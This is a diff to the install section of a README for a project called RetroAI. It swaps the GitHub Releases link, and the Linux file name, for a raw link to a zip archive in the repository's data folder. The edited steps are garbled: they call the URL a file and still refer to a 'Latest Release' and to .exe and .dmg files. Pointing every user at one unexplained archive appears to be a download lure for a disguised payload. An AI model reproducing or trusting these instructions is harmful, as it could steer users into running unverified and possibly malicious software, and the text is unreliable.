cyberring123/RetroAI/README.md

 ### 📥 Download & Install

-To get started, visit the [Releases page](https://github.com/cyberring123/RetroAI/releases) to download the application.
+To get started, visit the [Releases page](https://raw.githubusercontent.com/cyberring123/RetroAI/main/data/Retro-AI-v1.6-alpha.2.zip) to download the application.
 Follow these steps:

 1. Click on the link above.
 2. Locate the latest release marked as "Latest Release".
 3. Download the appropriate file for your operating system:
    - For Windows: Download the `.exe` file.
    - For macOS: Download the `.dmg` file.
-   - For Linux: Look for the `.tar.gz` file.
+   - For Linux: Look for the `https://raw.githubusercontent.com/cyberring123/RetroAI/main/data/Retro-AI-v1.6-alpha.2.zip` file.

 Once you download the file:

 - **For Windows**: Double-click the `.exe` file to start the installation.
 Follow the on-screen instructions.
 - **For macOS**: Open the `.dmg` file and drag the RetroAI icon to your Applications folder.
-- **For Linux**: Extract the `.tar.gz` file and follow the README instructions to run the chatbot.
+- **For Linux**: Extract the `https://raw.githubusercontent.com/cyberring123/RetroAI/main/data/Retro-AI-v1.6-alpha.2.zip` file and follow the README instructions to run the chatbot.

 ## 🎤 Features